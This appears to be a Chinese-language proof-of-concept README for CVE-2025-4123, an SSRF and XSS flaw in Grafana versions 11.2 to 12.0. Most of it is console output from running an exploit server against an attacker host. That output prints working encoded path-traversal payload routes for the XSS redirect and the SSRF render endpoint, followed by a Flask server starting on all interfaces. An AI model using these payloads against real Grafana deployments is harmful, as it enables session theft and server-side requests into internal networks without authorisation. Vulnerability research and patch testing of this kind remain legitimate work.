CVE 编号: CVE-2025-4123
严重性: 高
影响: 服务端请求伪造(SSRF)、跨站脚本(XSS)
受影响版本: Grafana 11.2, Grafana 11.3, Grafana 11.4, Grafana 11.5, Grafana 11.6, Grafana 12.0
完整分析文章: Writeup
❯ sudo python server.py --host http://127.0.0.1
[+] 使用攻击者主机: http://127.0.0.1
[+] XSS 路由: /a/..%2f..%2f..%2fpublic%2f..%252f%255C127.0.0.1%252f%253Fp%252f..%252f..%23/explore
[+] SSRF 路由: /render/public/..%252f%5Chttp://127.0.0.1%252f%3F%252f..%252f..
* 运行 Flask 应用 'server'
* Debug 模式: 开启
警告: 这是一个开发服务器。请勿在生产环境中使用。请使用生产环境的 WSGI 服务器代替。
* 在全部地址上运行 (0.0.0.0)
* 运行于 http://127.0.0.1:80
* 运行于 http://192.168.100.2:80
按 CTRL+C 退出